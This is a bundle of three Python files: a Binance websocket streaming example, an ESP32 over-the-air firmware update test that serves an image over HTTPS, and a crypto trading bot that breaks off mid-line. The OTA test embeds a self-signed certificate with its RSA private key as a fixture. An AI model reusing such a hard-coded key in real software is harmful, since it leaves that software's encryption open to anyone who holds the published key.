# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from unicorn_binance_websocket_api.manager import BinanceWebSocketApiManager
import logging
import os
import sys
import time
import threading
logging.getLogger("unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager")
logging.basicConfig(level=logging.DEBUG,
filename=os.path.basename(__file__) + '.log',
format="{asctime} [{levelname:8}] {process} {thread} {module}: {message}",
style="{")
def print_stream_data_from_stream_buffer(binance_websocket_api_manager):
    """Drain the manager's stream_buffer forever, printing each record.

    Exits the process when the manager reports it is stopping.
    """
    while True:
        if binance_websocket_api_manager.is_manager_stopping():
            sys.exit(0)
        record = binance_websocket_api_manager.pop_stream_data_from_stream_buffer()
        if record is False:
            # Buffer empty — back off briefly instead of busy-waiting.
            time.sleep(0.01)
            continue
        try:
            # remove # to activate the print function:
            print(record)
        except KeyError:
            # Not able to process the data yet? Write it back to the
            # stream_buffer so it is retried later.
            binance_websocket_api_manager.add_to_stream_buffer(record)
# create instance of BinanceWebSocketApiManager and provide the function for stream processing
binance_websocket_api_manager = BinanceWebSocketApiManager()
# create streams
ticker_all_stream_id = binance_websocket_api_manager.create_stream(["arr"], ["!ticker"])
miniticker_stream_id = binance_websocket_api_manager.create_stream(["arr"], ["!miniTicker"])
# Large market set used for the per-market streams below.
markets = {'bnbbtc', 'ethbtc', 'btcusdt', 'bchabcusdt', 'xrpusdt', 'rvnbtc', 'ltcusdt', 'adausdt', 'eosusdt',
           'neousdt', 'bnbusdt', 'adabtc', 'ethusdt', 'trxbtc', 'bchabcbtc', 'ltcbtc', 'xrpbtc',
           'ontbtc', 'bttusdt', 'eosbtc', 'xlmbtc', 'bttbtc', 'tusdusdt', 'xlmusdt', 'qkcbtc', 'zrxbtc',
           'neobtc', 'adaeth', 'icxusdt', 'btctusd', 'icxbtc', 'btcusdc', 'wanbtc', 'zecbtc', 'wtcbtc',
           'batbtc', 'adabnb', 'etcusdt', 'qtumusdt', 'xmrbtc', 'trxeth', 'adatusd', 'trxxrp', 'trxbnb',
           'dashbtc', 'rvnbnb', 'bchabctusd', 'etcbtc', 'bnbeth', 'ethpax', 'nanobtc', 'xembtc', 'xrpbnb',
           'bchabcpax', 'xrpeth', 'bttbnb', 'ltcbnb', 'agibtc', 'zrxusdt', 'xlmbnb', 'ltceth', 'eoseth',
           'ltctusd', 'polybnb', 'scbtc', 'steembtc', 'trxtusd', 'npxseth', 'kmdbtc', 'polybtc', 'gasbtc',
           'engbtc', 'zileth', 'xlmeth', 'eosbnb', 'xrppax', 'lskbtc', 'npxsbtc', 'xmrusdt', 'ltcpax',
           'ethtusd', 'batusdt', 'mcobtc', 'neoeth', 'bntbtc', 'eostusd', 'lrcbtc', 'funbtc', 'zecusdt',
           'bnbpax', 'linkusdt', 'hceth', 'zrxeth', 'icxeth', 'xmreth', 'neobnb', 'etceth', 'zeceth', 'xmrbnb',
           'wanbnb', 'zrxbnb', 'agibnb', 'funeth', 'arketh', 'engeth'}
# One multiplex stream per channel over the full market set.
# NOTE(review): "aggTrade" is created here and again a few lines below —
# presumably a duplicate; confirm whether two aggTrade streams are intended.
binance_websocket_api_manager.create_stream(["aggTrade"], markets)
binance_websocket_api_manager.create_stream(["trade"], markets)
binance_websocket_api_manager.create_stream(["kline_1m"], markets)
binance_websocket_api_manager.create_stream(["kline_5m"], markets)
binance_websocket_api_manager.create_stream(["kline_15m"], markets)
binance_websocket_api_manager.create_stream(["kline_1h"], markets)
binance_websocket_api_manager.create_stream(["kline_12h"], markets)
binance_websocket_api_manager.create_stream(["kline_1w"], markets)
binance_websocket_api_manager.create_stream(["ticker"], markets)
binance_websocket_api_manager.create_stream(["miniTicker"], markets)
binance_websocket_api_manager.create_stream(["depth"], markets)
binance_websocket_api_manager.create_stream(["depth5"], markets)
binance_websocket_api_manager.create_stream(["depth10"], markets)
binance_websocket_api_manager.create_stream(["depth20"], markets)
binance_websocket_api_manager.create_stream(["aggTrade"], markets)
# Smaller market subset for the combined multi-channel stream below.
# (This rebinding does not affect the streams created above — they captured
# the full set already.)
markets = {'bnbbtc', 'ethbtc', 'btcusdt', 'bchabcusdt', 'xrpusdt', 'rvnbtc', 'ltcusdt', 'adausdt', 'eosusdt',
           'neobtc', 'adaeth', 'icxusdt', 'btctusd', 'icxbtc', 'btcusdc', 'wanbtc', 'zecbtc', 'wtcbtc',
           'batbtc', 'adabnb', 'etcusdt', 'qtumusdt', 'xmrbtc', 'trxeth', 'adatusd', 'trxxrp', 'trxbnb',
           'ltctusd', 'polybnb', 'scbtc', 'steembtc', 'trxtusd', 'npxseth', 'kmdbtc', 'polybtc', 'gasbtc',
           'bnbpax', 'linkusdt', 'hceth', 'zrxeth', 'icxeth', 'xmreth', 'neobnb', 'etceth', 'zeceth', 'xmrbnb'}
channels = {'trade', 'kline_1m', 'kline_5m', 'kline_15m', 'kline_30m', 'kline_1h', 'kline_12h', 'kline_1w',
            'miniTicker', 'depth20'}
binance_websocket_api_manager.create_stream(channels, markets)
# start a worker process to process to move the received stream_data from the stream_buffer to a print function
worker_thread = threading.Thread(target=print_stream_data_from_stream_buffer, args=(binance_websocket_api_manager,))
worker_thread.start()
# start a restful api server to report the current status to 'tools/icinga/check_binance_websocket_manager' which can be
# used as a check_command for ICINGA/Nagios
#binance_websocket_api_manager.start_monitoring_api(warn_on_update=False)
binance_websocket_api_manager.start_monitoring_api()
# if you like to not only listen on localhost use 'host="0.0.0.0"'
# for a specific port do 'port=80'
# binance_websocket_api_manager.start_monitoring_api(host="0.0.0.0", port=80)
print("18 websockets started!")
print("Continue here: https://github.com/LUCIT-Systems-and-Development/unicorn-binance-websocket-api/wiki/"
      "UNICORN-Monitoring-API-Service")
|
example_test.py | import re
import os
import socket
from threading import Thread
import ssl
from tiny_test_fw import DUT
import ttfw_idf
try:
import BaseHTTPServer
from SimpleHTTPServer import SimpleHTTPRequestHandler
except ImportError:
import http.server as BaseHTTPServer
from http.server import SimpleHTTPRequestHandler
# Self-signed certificate/key pair embedded for the local HTTPS OTA test
# server started by start_https_server(). Test fixture only — not a real
# secret worth protecting (the "private" key is intentionally public).
server_cert = "-----BEGIN CERTIFICATE-----\n" \
              "MIIDXTCCAkWgAwIBAgIJAP4LF7E72HakMA0GCSqGSIb3DQEBCwUAMEUxCzAJBgNV\n"\
              "BAYTAkFVMRMwEQYDVQQIDApTb21lLVN0YXRlMSEwHwYDVQQKDBhJbnRlcm5ldCBX\n"\
              "aWRnaXRzIFB0eSBMdGQwHhcNMTkwNjA3MDk1OTE2WhcNMjAwNjA2MDk1OTE2WjBF\n"\
              "MQswCQYDVQQGEwJBVTETMBEGA1UECAwKU29tZS1TdGF0ZTEhMB8GA1UECgwYSW50\n"\
              "ZXJuZXQgV2lkZ2l0cyBQdHkgTHRkMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIB\n"\
              "CgKCAQEAlzfCyv3mIv7TlLkObxunKfCdrJ/zgdANrsx0RBtpEPhV560hWJ0fEin0\n"\
              "nIOMpJSiF9E6QsPdr6Q+eogH4XnOMU9JE+iG743N1dPfGEzJvRlyct/Ck8SswKPC\n"\
              "9+VXsnOdZmUw9y/xtANbURA/TspvPzz3Avv382ffffrJGh7ooOmaZSCZFlSYHLZA\n"\
              "w/XlRr0sSRbLpFGY0gXjaAV8iHHiPDYLy4kZOepjV9U51xi+IGsL4w75zuMgsHyF\n"\
              "3nJeGYHgtGVBrkL0ZKG5udY0wcBjysjubDJC4iSlNiq2HD3fhs7j6CZddV2v845M\n"\
              "lVKNxP0kO4Uj4D8r+5USWC8JKfAwxQIDAQABo1AwTjAdBgNVHQ4EFgQU6OE7ssfY\n"\
              "IIPTDThiUoofUpsD5NwwHwYDVR0jBBgwFoAU6OE7ssfYIIPTDThiUoofUpsD5Nww\n"\
              "DAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQsFAAOCAQEAXIlHS/FJWfmcinUAxyBd\n"\
              "/xd5Lu8ykeru6oaUCci+Vk9lyoMMES7lQ+b/00d5x7AcTawkTil9EWpBTPTOTraA\n"\
              "lzJMQhNKmSLk0iIoTtAJtSZgUSpIIozqK6lenxQQDsHbXKU6h+u9H6KZE8YcjsFl\n"\
              "6vL7sw9BVotw/VxfgjQ5OSGLgoLrdVT0z5C2qOuwOgz1c7jNiJhtMdwN+cOtnJp2\n"\
              "fuBgEYyE3eeuWogvkWoDcIA8r17Ixzkpq2oJsdvZcHZPIZShPKW2SHUsl98KDemu\n"\
              "y0pQyExmQUbwKE4vbFb9XuWCcL9XaOHQytyszt2DeD67AipvoBwVU7/LBOvqnsmy\n"\
              "hA==\n"\
              "-----END CERTIFICATE-----\n"
# Matching RSA private key for the test certificate above.
server_key = "-----BEGIN PRIVATE KEY-----\n"\
             "MIIEvAIBADANBgkqhkiG9w0BAQEFAASCBKYwggSiAgEAAoIBAQCXN8LK/eYi/tOU\n"\
             "uQ5vG6cp8J2sn/OB0A2uzHREG2kQ+FXnrSFYnR8SKfScg4yklKIX0TpCw92vpD56\n"\
             "iAfhec4xT0kT6Ibvjc3V098YTMm9GXJy38KTxKzAo8L35Veyc51mZTD3L/G0A1tR\n"\
             "ED9Oym8/PPcC+/fzZ999+skaHuig6ZplIJkWVJgctkDD9eVGvSxJFsukUZjSBeNo\n"\
             "BXyIceI8NgvLiRk56mNX1TnXGL4gawvjDvnO4yCwfIXecl4ZgeC0ZUGuQvRkobm5\n"\
             "1jTBwGPKyO5sMkLiJKU2KrYcPd+GzuPoJl11Xa/zjkyVUo3E/SQ7hSPgPyv7lRJY\n"\
             "Lwkp8DDFAgMBAAECggEAfBhAfQE7mUByNbxgAgI5fot9eaqR1Nf+QpJ6X2H3KPwC\n"\
             "02sa0HOwieFwYfj6tB1doBoNq7i89mTc+QUlIn4pHgIowHO0OGawomeKz5BEhjCZ\n"\
             "4XeLYGSoODary2+kNkf2xY8JTfFEcyvGBpJEwc4S2VyYgRRx+IgnumTSH+N5mIKZ\n"\
             "SXWNdZIuHEmkwod+rPRXs6/r+PH0eVW6WfpINEbr4zVAGXJx2zXQwd2cuV1GTJWh\n"\
             "cPVOXLu+XJ9im9B370cYN6GqUnR3fui13urYbnWnEf3syvoH/zuZkyrVChauoFf8\n"\
             "8EGb74/HhXK7Q2s8NRakx2c7OxQifCbcy03liUMmyQKBgQDFAob5B/66N4Q2cq/N\n"\
             "MWPf98kYBYoLaeEOhEJhLQlKk0pIFCTmtpmUbpoEes2kCUbH7RwczpYko8tlKyoB\n"\
             "6Fn6RY4zQQ64KZJI6kQVsjkYpcP/ihnOY6rbds+3yyv+4uPX7Eh9sYZwZMggE19M\n"\
             "CkFHkwAjiwqhiiSlUxe20sWmowKBgQDEfx4lxuFzA1PBPeZKGVBTxYPQf+DSLCre\n"\
             "ZFg3ZmrxbCjRq1O7Lra4FXWD3dmRq7NDk79JofoW50yD8wD7I0B7opdDfXD2idO8\n"\
             "0dBnWUKDr2CAXyoLEINce9kJPbx4kFBQRN9PiGF7VkDQxeQ3kfS8CvcErpTKCOdy\n"\
             "5wOwBTwJdwKBgDiTFTeGeDv5nVoVbS67tDao7XKchJvqd9q3WGiXikeELJyuTDqE\n"\
             "zW22pTwMF+m3UEAxcxVCrhMvhkUzNAkANHaOatuFHzj7lyqhO5QPbh4J3FMR0X9X\n"\
             "V8VWRSg+jA/SECP9koOl6zlzd5Tee0tW1pA7QpryXscs6IEhb3ns5R2JAoGAIkzO\n"\
             "RmnhEOKTzDex611f2D+yMsMfy5BKK2f4vjLymBH5TiBKDXKqEpgsW0huoi8Gq9Uu\n"\
             "nvvXXAgkIyRYF36f0vUe0nkjLuYAQAWgC2pZYgNLJR13iVbol0xHJoXQUHtgiaJ8\n"\
             "GLYFzjHQPqFMpSalQe3oELko39uOC1CoJCHFySECgYBeycUnRBikCO2n8DNhY4Eg\n"\
             "9Y3oxcssRt6ea5BZwgW2eAYi7/XqKkmxoSoOykUt3MJx9+EkkrL17bxFSpkj1tvL\n"\
             "qvxn7egtsKjjgGNAxwXC4MwCvhveyUQQxtQb8AqGrGqo4jEEN0L15cnP38i2x1Uo\n"\
             "muhfskWf4MABV0yTUaKcGg==\n"\
             "-----END PRIVATE KEY-----\n"
def get_my_ip():
    """Return the host's outbound IPv4 address as a string.

    "Connecting" a UDP socket to a public address sends no packets; it just
    makes the OS pick the local interface/address for that route, which we
    then read back with getsockname().
    """
    # Bug fix: the original leaked the socket if connect() raised; the
    # context manager closes it on every path.
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as probe:
        probe.connect(("8.8.8.8", 80))
        return probe.getsockname()[0]
def start_https_server(ota_image_dir, server_ip, server_port):
    """Serve *ota_image_dir* over HTTPS using the embedded self-signed cert.

    Writes server_cert/server_key to PEM files inside the directory, then
    serves it forever with SimpleHTTPRequestHandler. Intended to run on a
    daemon thread; never returns.
    """
    os.chdir(ota_image_dir)
    server_file = os.path.join(ota_image_dir, "server_cert.pem")
    with open(server_file, "w+") as cert_file_handle:
        cert_file_handle.write(server_cert)
    key_file = os.path.join(ota_image_dir, "server_key.pem")
    # Bug fix: the original opened the literal name "server_key.pem" instead
    # of the computed key_file path — it only worked because of the chdir
    # above. Use the absolute path consistently.
    with open(key_file, "w+") as key_file_handle:
        key_file_handle.write(server_key)
    httpd = BaseHTTPServer.HTTPServer((server_ip, server_port),
                                      SimpleHTTPRequestHandler)
    # NOTE: ssl.wrap_socket is deprecated (removed in Python 3.12); kept here
    # for compatibility with the Python versions this test harness targets.
    httpd.socket = ssl.wrap_socket(httpd.socket,
                                   keyfile=key_file,
                                   certfile=server_file, server_side=True)
    httpd.serve_forever()
@ttfw_idf.idf_example_test(env_tag="Example_WIFI")
def test_examples_protocol_simple_ota_example(env, extra_data):
    """
    steps: |
    1. join AP
    2. Fetch OTA image over HTTPS
    3. Reboot with the new OTA image
    """
    dut1 = env.get_dut("simple_ota_example", "examples/system/ota/simple_ota_example", dut_class=ttfw_idf.ESP32DUT)
    # check and log bin size
    binary_file = os.path.join(dut1.app.binary_path, "simple_ota.bin")
    bin_size = os.path.getsize(binary_file)
    ttfw_idf.log_performance("simple_ota_bin_size", "{}KB".format(bin_size // 1024))
    ttfw_idf.check_performance("simple_ota_bin_size", bin_size // 1024, dut1.TARGET)
    # start test: serve the OTA image from this host over HTTPS
    host_ip = get_my_ip()
    thread1 = Thread(target=start_https_server, args=(dut1.app.binary_path, host_ip, 8000))
    thread1.daemon = True
    thread1.start()
    dut1.start_app()
    dut1.expect("Loaded app from partition at offset 0x10000", timeout=30)
    try:
        ip_address = dut1.expect(re.compile(r" sta ip: ([^,]+),"), timeout=30)
        print("Connected to AP with IP: {}".format(ip_address))
    except DUT.ExpectTimeout:
        raise ValueError('ENV_TEST_FAILURE: Cannot connect to AP')
    # Bug fix: the original called thread1.close() here, but threading.Thread
    # has no close() method, so the test died with AttributeError. The server
    # thread is a daemon and is torn down automatically at process exit.
    dut1.expect("Starting OTA example", timeout=30)
    print("writing to device: {}".format("https://" + host_ip + ":8000/simple_ota.bin"))
    dut1.write("https://" + host_ip + ":8000/simple_ota.bin")
    # After flashing, the device must boot the new image from the OTA slot.
    dut1.expect("Loaded app from partition at offset 0x110000", timeout=60)
    dut1.expect("Starting OTA example", timeout=30)


if __name__ == '__main__':
    test_examples_protocol_simple_ota_example()
|
Binance Detect Moonings.py | """
Olorin Sledge Fork
Version: 1.28
Disclaimer
All investment strategies and investments involve risk of loss.
Nothing contained in this program, scripts, code or repository should be
construed as investment advice. Any reference to an investment's past or
potential performance is not, and should not be construed as, a recommendation
or as a guarantee of any specific outcome or profit.
By using this program you accept all liabilities,
and that no claims can be made against the developers,
or others connected with the program.
See requirements.txt for versions of modules needed
!! IMPORTANT INFORMATION ABOUT EXTERNAL SIGNAL MODULES !!
Please note this very important difference. If you use any external signals, they need to be modified as follows:
1) If it is a buy signal, you need to replace .exs with .buy so it creates a signals/whatever.buy (where "whatever" is anything you want)
2) If it is a sell signal, you need to replace .exs with .sell so it creates a signals/whatever.sell (where "whatever" is anything you want)
3) If it is a pausebot signal, you need to create a signals/pausebot.pause file
All these changes are within the external signal itself and is really easy to do via Find/Replace (advice you manually review any replace you do).
FUNCTIONALITY
- Changed way profit % is calculated to be based on ROI
- More details provided on screen on state of bot (i.e. unrealised session profit, session profit, all time profit, bot paused or not etc)
- Totally reworked external signals. NOTE: you CANNOT use the default signals anymore with my bot unless you modify them to work with it
- Sell all coins on stopping bot functionality
- Stop bot on session profit / session stop loss trigger
- Only sell based on an external signal i.e. Stop Loss and Take Profit are ignored
- Discord support
- Better reporting in trades.txt
- A history.txt that records state of bot every minute (useful for past analysis /charting)
- Better error trapping on certain exceptions
- BNB is no longer used as the reference for TIME_DIFFERENCE, this allows one to not have it in their tickers.txt list.
- Tickers list can now auto reload (if set in the config.yml file)
- Held coins displayed in a Table format
- Market profit vs Bot profit comparison
- Restart an external signal every hour
- Sell a specific coin on stopping bot function
- Bot can reinvest any profits from coins sold so as to compound your profits. Please note, this will also compound any losses so use with care.
Configurable in config.yml with REINVEST_PROFITS flag.
Added version 1.20:
- Has a "Market Profit". This is a comparison between your bots profits and if you had just bought BTC instead when you started your bot.
Please note: If your bot has already been running for a period of time, you will need to manually modify your bots_stat.json and update
the "market_startprice" variable. This needs to be the price of BTC when your bot originally started.
Added version 1.21:
- Ability to "restart" an external signal via the RESTART_EXTSIGNALS setting. Please only use this is you know what you are doing. 99% of the time
you will want this to be False
Added version 1.25:
- "BUYING MODE" added to summary info so you can easily tell if you are in Test mode or Live mode
- "External Signals" added to summary info so you can tell which external signals you have running
Added version 1.26:
- "Sell A Specific Coin" feature enhancement added. When you end the bot, it gives you the option to sell a specific coin.
1. The bot will display the coins you can sell in a table
2. Type in the SYMBOL including the pair and the bot will sell it.
3. It will loop 1 to 2 until you choose N
4. Bot ends
Added version 1.27
- Menu system on stopping (CTRL+C) the bot for options to: Exit bot, sell all coins, sell specific coin, resume bot
Added version 1.28
- Reinvest profits, and losses, to compound capital
DONATIONS
If you feel you would like to donate to me, for all the above improvements, I would greatly appreciate it. Please see donation options below.
Bitcoin (BTC network): 1DMRzMWXRXLeTQ9mfN9uvMTeJHmkkG5oS8
Etherium (ERC-20 network): 0x69566c866817c593d8a40a1b672afa3b7cfd69bf
Matic (Polygon network): 0x69566c866817c593d8a40a1b672afa3b7cfd69bf
BNB (BEP20 network): 0x69566c866817c593d8a40a1b672afa3b7cfd69bf
Fantom (FTM network): 0x69566c866817c593d8a40a1b672afa3b7cfd69bf
Algo (Algorand network): ML72MOJ7N3O4G4EGDLKICNOCMIBCH4U5I34WCXZ4B4HREPBA3ME7BOYPB4
Nano (Nano network): nano_1en6m9rx9wgwqu5e1otedzprpgjbnrjs43gi9g94r5nu31ikc1heytt8qd74
ORIGINAL BOT CREATOR
This bot was forked from the original creation by CyberPunkMetalHead.
You can find his repository of projects at https://github.com/CyberPunkMetalHead.
You can find details to donate to him at his website, https://www.cryptomaton.org.
"""
# use for environment variables
import os
# use if needed to pass args to external modules
import sys
# used for math functions
import math
# used to create threads & dynamic loading of modules
import threading
import multiprocessing
import importlib
# used for directory handling
import glob
#discord needs import request
import requests
# Needed for colorful console output Install with: python3 -m pip install colorama (Mac/Linux) or pip install colorama (PC)
from colorama import init
init()
# needed for the binance API / websockets / Exception handling
from binance.client import Client
from binance.exceptions import BinanceAPIException
from binance.helpers import round_step_size
from requests.exceptions import ReadTimeout, ConnectionError
# used for dates
from datetime import date, datetime, timedelta
import time
# used to repeatedly execute the code
from itertools import count
# used to store trades and sell assets
import json
# used to display holding coins in an ascii table
from prettytable import PrettyTable
# Load helper modules
from helpers.parameters import (
parse_args, load_config
)
# Load creds modules
from helpers.handle_creds import (
load_correct_creds, test_api_key,
load_discord_creds
)
# my helper utils
from helpers.os_utils import(rchop)
# for colourful logging to the console
class txcolors:
    """ANSI escape codes for colourful console output."""
    BUY = '\033[92m'          # bright green
    WARNING = '\033[93m'      # bright yellow
    SELL_LOSS = '\033[91m'    # bright red
    SELL_PROFIT = '\033[32m'  # green
    DIM = '\033[2m\033[35m'   # dim + magenta (used for timestamps)
    DEFAULT = '\033[39m'      # reset foreground colour only
    YELLOW = '\033[33m'
    CYAN = '\033[96m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'
    ENDC = '\033[0m'          # reset all attributes
# tracks profit/loss each session
# NOTE: 'global' statements at module scope are no-ops; kept as-is.
global session_profit_incfees_perc, session_profit_incfees_total, session_tpsl_override_msg, is_bot_running
session_profit_incfees_perc = 0
session_profit_incfees_total = 0
session_tpsl_override_msg = ""
is_bot_running = True

global historic_profit_incfees_perc, historic_profit_incfees_total, trade_wins, trade_losses
global sell_all_coins, bot_started_datetime, market_startprice, market_currprice, sell_specific_coin

# The try/except NameError blocks keep any values that already exist (e.g.
# when the script is re-executed inside the same interpreter); otherwise the
# all-time stats start from their defaults.
try:
    historic_profit_incfees_perc
except NameError:
    historic_profit_incfees_perc = 0 # or some other default value.
try:
    historic_profit_incfees_total
except NameError:
    historic_profit_incfees_total = 0 # or some other default value.
try:
    trade_wins
except NameError:
    trade_wins = 0 # or some other default value.
try:
    trade_losses
except NameError:
    trade_losses = 0 # or some other default value.

# Set properly once the main loop starts.
bot_started_datetime = ""
# BTC price when the bot started; baseline for the "market profit" comparison.
market_startprice = 0

# print with timestamps
old_out = sys.stdout
class St_ampe_dOut:
    """stdout proxy that prefixes each new output line with a dim timestamp."""

    # True when the next write starts a fresh line (so it needs a stamp).
    nl = True

    def write(self, x):
        """Forward *x* to the real stdout, stamping the start of each line."""
        if x == '\n':
            old_out.write(x)
            self.nl = True
            return
        if not self.nl:
            # Mid-line continuation — pass through untouched.
            old_out.write(x)
            return
        stamp = str(datetime.now().replace(microsecond=0))
        old_out.write(f'{txcolors.DIM}[{stamp}]{txcolors.DEFAULT} {x}')
        self.nl = False

    def flush(self):
        pass
sys.stdout = St_ampe_dOut()
def is_fiat():
    """Return True when the configured base pair is a fiat/stablecoin."""
    global hsp_head
    PAIR_WITH = parsed_config['trading_options']['PAIR_WITH']
    # List kept in the order Binance displays them (not alphabetical).
    fiats = ['USDT', 'BUSD', 'AUD', 'BRL', 'EUR', 'GBP', 'RUB', 'TRY', 'TUSD', 'USDC', 'PAX', 'BIDR', 'DAI', 'IDRT', 'UAH', 'NGN', 'VAI', 'BVND']
    return PAIR_WITH in fiats
def decimals():
    """Number of decimal places used when reporting fractions of the base pair."""
    # Fiat/stablecoin pairs read better with 4 decimals; crypto pairs need 8.
    return 4 if is_fiat() else 8
def print_table(table):
    """Print a PrettyTable without stamping each row with a timestamp."""
    global old_out
    print('')
    # Temporarily restore the raw stdout so the table rows stay unprefixed,
    # then reinstall the timestamping wrapper.
    sys.stdout = old_out
    print(table)
    sys.stdout = St_ampe_dOut()
def print_notimestamp(msg):
    """Print *msg* followed by a space, bypassing the timestamp prefix."""
    global old_out
    # Swap the raw stdout back in just for this one print.
    sys.stdout = old_out
    print(msg, end=' ')
    sys.stdout = St_ampe_dOut()
def get_price(add_to_historical=True):
    '''Return the current price for all coins on binance'''
    global historical_prices, hsp_head, market_startprice, market_currprice
    initial_price = {}
    prices = client.get_all_tickers()
    for coin in prices:
        # BTCUSDT is tracked separately as the "market" benchmark for the
        # bot-vs-market profit comparison.
        if coin['symbol'] == "BTCUSDT":
            if market_startprice == 0:
                market_startprice = float(coin['price'])
            market_currprice = float(coin['price'])
        # Keep only symbols that pair with PAIR_WITH and are not FIATS pairs;
        # with CUSTOM_LIST the symbol must also come from the tickers file.
        if CUSTOM_LIST:
            if any(item + PAIR_WITH == coin['symbol'] for item in tickers) and all(item not in coin['symbol'] for item in FIATS):
                initial_price[coin['symbol']] = { 'price': coin['price'], 'time': datetime.now()}
        else:
            if PAIR_WITH in coin['symbol'] and all(item not in coin['symbol'] for item in FIATS):
                initial_price[coin['symbol']] = { 'price': coin['price'], 'time': datetime.now()}
    if add_to_historical:
        # Advance the circular-buffer head and store this snapshot; the buffer
        # wraps every RECHECK_INTERVAL snapshots.
        hsp_head += 1
        if hsp_head == RECHECK_INTERVAL:
            hsp_head = 0
        historical_prices[hsp_head] = initial_price
    return initial_price
def wait_for_price():
    '''calls the initial price and ensures the correct amount of time has passed
    before reading the current price again

    Returns (volatile_coins, count, latest_snapshot): coins whose gain over
    the TIME_DIFFERENCE window exceeds CHANGE_IN_PRICE, plus any external
    buy signals, respecting TRADE_SLOTS and the per-coin cool-off.
    '''
    global historical_prices, hsp_head, volatility_cooloff
    volatile_coins = {}
    externals = {}
    coins_up = 0
    coins_down = 0
    coins_unchanged = 0
    # Honour an external pausebot signal before doing anything else.
    pause_bot()
    # get first element from the dictionary — any coin works as the clock
    # reference, since all entries in a snapshot share the same timestamp.
    firstcoin = next(iter(historical_prices[hsp_head]))
    #BBif historical_prices[hsp_head]['BNB' + PAIR_WITH]['time'] > datetime.now() - timedelta(minutes=float(TIME_DIFFERENCE / RECHECK_INTERVAL)):
    if historical_prices[hsp_head][firstcoin]['time'] > datetime.now() - timedelta(minutes=float(TIME_DIFFERENCE / RECHECK_INTERVAL)):
        # sleep for exactly the amount of time required
        #BBtime.sleep((timedelta(minutes=float(TIME_DIFFERENCE / RECHECK_INTERVAL)) - (datetime.now() - historical_prices[hsp_head]['BNB' + PAIR_WITH]['time'])).total_seconds())
        time.sleep((timedelta(minutes=float(TIME_DIFFERENCE / RECHECK_INTERVAL)) - (datetime.now() - historical_prices[hsp_head][firstcoin]['time'])).total_seconds())
    # retrieve latest prices
    #last_price = get_price()
    last_price = wrap_get_price()
    # calculate the difference in prices
    for coin in historical_prices[hsp_head]:
        # minimum and maximum prices over time period
        try:
            min_price = min(historical_prices, key = lambda x: float("inf") if x is None else float(x[coin]['price']))
            max_price = max(historical_prices, key = lambda x: -1 if x is None else float(x[coin]['price']))
            # Signed % move: negative when the low came *after* the high.
            threshold_check = (-1.0 if min_price[coin]['time'] > max_price[coin]['time'] else 1.0) * (float(max_price[coin]['price']) - float(min_price[coin]['price'])) / float(min_price[coin]['price']) * 100
            #if coin == "BTCUSDT" or coin == "ETHUSDT":
            #print(f"coin: {coin} min_price: {min_price[coin]['price']} max_price: {max_price[coin]['price']}")
        except KeyError:
            # Coin missing from older snapshots (e.g. just added to tickers).
            if DEBUG:
                print(f"wait_for_price(): Got a KeyError for {coin}. If this coin was just added to your tickers file, no need to worry about this KeyError.")
            continue
        # FOR NEGATIVE PRICE CHECKING
        #if threshold_check>0 and CHANGE_IN_PRICE<0: threshold_check=0
        # each coin with higher gains than our CHANGE_IN_PRICE is added to the volatile_coins dict if less than TRADE_SLOTS is not reached.
        # FOR NEGATIVE PRICE CHECKING
        #if abs(threshold_check) > abs(CHANGE_IN_PRICE):
        if threshold_check > CHANGE_IN_PRICE:
            coins_up +=1
            if coin not in volatility_cooloff:
                # Seed the cool-off so a brand-new coin is immediately eligible.
                volatility_cooloff[coin] = datetime.now() - timedelta(minutes=TIME_DIFFERENCE)
                # volatility_cooloff[coin] = datetime.now() - timedelta(minutes=COOLOFF_PERIOD)
            # only include coin as volatile if it hasn't been picked up in the last TIME_DIFFERENCE minutes already
            if datetime.now() >= volatility_cooloff[coin] + timedelta(minutes=TIME_DIFFERENCE):
                #if datetime.now() >= volatility_cooloff[coin] + timedelta(minutes=COOLOFF_PERIOD):
                volatility_cooloff[coin] = datetime.now()
                # TRADE_SLOTS == 0 means "unlimited slots".
                if len(coins_bought) + len(volatile_coins) < TRADE_SLOTS or TRADE_SLOTS == 0:
                    volatile_coins[coin] = round(threshold_check, 3)
                    print(f'{coin} has gained {volatile_coins[coin]}% within the last {TIME_DIFFERENCE} minutes, purchasing ${TRADE_TOTAL} {PAIR_WITH} of {coin}!')
                else:
                    print(f'{txcolors.WARNING}{coin} has gained {round(threshold_check, 3)}% within the last {TIME_DIFFERENCE} minutes, but you are using all available trade slots!{txcolors.DEFAULT}')
            #else:
            #if len(coins_bought) == TRADE_SLOTS:
            # print(f'{txcolors.WARNING}{coin} has gained {round(threshold_check, 3)}% within the last {TIME_DIFFERENCE} minutes, but you are using all available trade slots!{txcolors.DEFAULT}')
            #else:
            # print(f'{txcolors.WARNING}{coin} has gained {round(threshold_check, 3)}% within the last {TIME_DIFFERENCE} minutes, but failed cool off period of {COOLOFF_PERIOD} minutes! Curr COP is {volatility_cooloff[coin] + timedelta(minutes=COOLOFF_PERIOD)}{txcolors.DEFAULT}')
        elif threshold_check < CHANGE_IN_PRICE:
            coins_down +=1
        else:
            coins_unchanged +=1
    # Disabled until fix
    #print(f'Up: {coins_up} Down: {coins_down} Unchanged: {coins_unchanged}')
    # Here goes new code for external signalling
    externals = buy_external_signals()
    exnumber = 0
    for excoin in externals:
        # External signals still respect the slot limit and skip held coins.
        if excoin not in volatile_coins and excoin not in coins_bought and \
